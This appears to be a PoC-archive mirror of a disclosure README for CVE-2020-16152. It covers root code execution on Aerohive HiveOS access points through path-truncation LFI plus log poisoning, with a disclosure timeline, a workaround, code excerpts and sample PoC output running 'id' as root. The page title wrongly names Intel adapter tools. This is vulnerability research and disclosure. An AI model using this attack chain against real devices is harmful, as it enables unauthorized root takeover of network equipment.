Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-16152 PoC — Linux Administrative Tools for Intel Network Adapters 安全漏洞

Source
https://github.com/eriknl/CVE-2020-16152
Associated Vulnerability
Title:Linux Administrative Tools for Intel Network Adapters 安全漏洞 (CVE-2020-16152)
Description:The NetConfig UI administrative interface in Extreme Networks ExtremeWireless Aerohive HiveOS and IQ Engine through 10.0r8a allows attackers to execute PHP code as the root user via remote HTTP requests that insert this code into a log file and then traverse to that file.
Description
Explanation and PoC for CVE-2020-16152
Readme
# CVE-2020-16152

## Summary
|      []()       |                                          |
| --------------- | ---------------------------------------- |
| Product vendor  | Aerohive Networks / Extreme Networks     |
| Product name    | HiveOS / IQ Engine                       |
| Product Version | Tested on 10.0r8a build-242466 and older |

The Aerohive/Extreme Networks HiveOS administrative webinterface (_NetConfig_) is vulnerable to LFI because it uses an old version of PHP vulnerable to string truncation attacks. An attacker is able to use this in conjunction with log poisoning to gain _root_ rights on a vulnerable access point.

As a work-around it is possible to disable the web interface with the following command: `no system web-server hive-UI enable` to protect against this vulnerability.

## Disclosure timeline:
|      []()       |                                          |
| --------------- | ---------------------------------------- |
| 2019/02/17 | Issue was reported to Aerohive Networks |
| 2019/02/19 | Acknowledgement issue was received by vendor, work around suggested by vendor (disable web interface) |
| 2019/02/25 | Confirmation of issue by vendor |
| 2019/03/18 | Ping? |
| 2019/05/30 | Ping? |
| 2019/06/03 | Vendor suggests a phonecall, replied with phone details. No call was received |
| 2019/08/12 | Ping? Vendor replied issue is escalated internally |
| 2019/09/23 | Ping? |
| 2019/09/25 | Vendor replies the LFI issue has not been addressed yet |
| 2020/07/30 | Found issue is still not fixed in HiveOS 10.0r8a build-242466 which dates from 05/2020. Reserved CVE and communicated 2020/09/01 deadline for publication unless a fix is actively being worked on |
| 2020/09/01 | Still no reply from vendor, release of details and PoC |

## Details
The `_page` parameter used for calls to `action/AhBaseAction.class.php5` as referenced by url `/action.php5` is used to dynamically load a PHP class that is used for a page as we can see in the code snippet below (`$pageName` is taken from `$_POST['_page']`):
```php
protected function getAccess($pageName,$actionType) {
  $filename = $pageName.'Access.class.php5';
  $classname = $pageName.'Access';
  if (include_once $filename) {
    require_once $filename;
    return new $classname($this->user,$actionType);
  }
  ...
}
```
As we can see there is no prefix for this filename making is possible to traverse path to arbitrary files. However because we're presented with a suffix it's not possible to include just any file. Since the version of PHP on the access point is quite old, we can actually work around this ([more info)](https://www.ush.it/2009/02/08/php-filesystem-attack-vectors/):
```
$ php-cgi -v
PHP Warning:  PHP Startup: Cannot dynamically load sockets.so - dynamic modules are not supported in Unknown on line 0
PHP 5.2.17 (cgi-fcgi) (built: May 28 2020 23:36:34)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies
```
By filling the path with enough `/` characters we can make sure the `Access.class.php5` suffix is completely truncated and are free to include arbitrary files.
Because failed login attempts are logged to `/tmp/messages` and include the submitted username we can use the login page to poison `/tmp/messages` and then run code from it with the LFI attack listed above.
Although the webserver itself is running a low privileged user the `php-cgi` instance used by `hiawatha` is actually running as _root_ which means all php code is executed as root:
```
$ ps | egrep "php|hiawatha"
 2237 root      9980 S    /usr/local/bin/php-cgi -b 127.0.0.1:2008
12088 admin    20840 S    /usr/local/sbin/hiawatha
```

## PoC
```
$ ./CVE-2020-16152.py 192.168.0.166 'echo -e "\n\n";id' | tail
2020-08-30 13:56:28 notice  root: ntpclient: [ntpclient]Set time - Sun Aug 30 13:56:28 GMT+1:00 2020
2020-08-30 13:56:28 notice  root: Connect [0.aerohive.pool.ntp.org] successful
2020-08-30 13:56:54 info    ah_dcd: application: get track-ip trigger access console request: cancel.
2020-08-30 13:57:00 notice  root: ntpclient: [ntpclient]Set time - Sun Aug 30 13:57:00 GMT+1:00 2020
2020-08-30 13:57:00 notice  root: Connect [0.aerohive.pool.ntp.org] successful
2020-08-30 13:57:31 notice  ah_webui: security: Admin "<


uid=0(root) gid=0(root)

```
File Snapshot

 [4.0K]  /data/pocs/3b9aa56c959f7a901d63ce86483801407fbe79eb
├── [ 729]  CVE-2020-16152.py
├── [ 34K]  LICENSE
└── [4.2K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →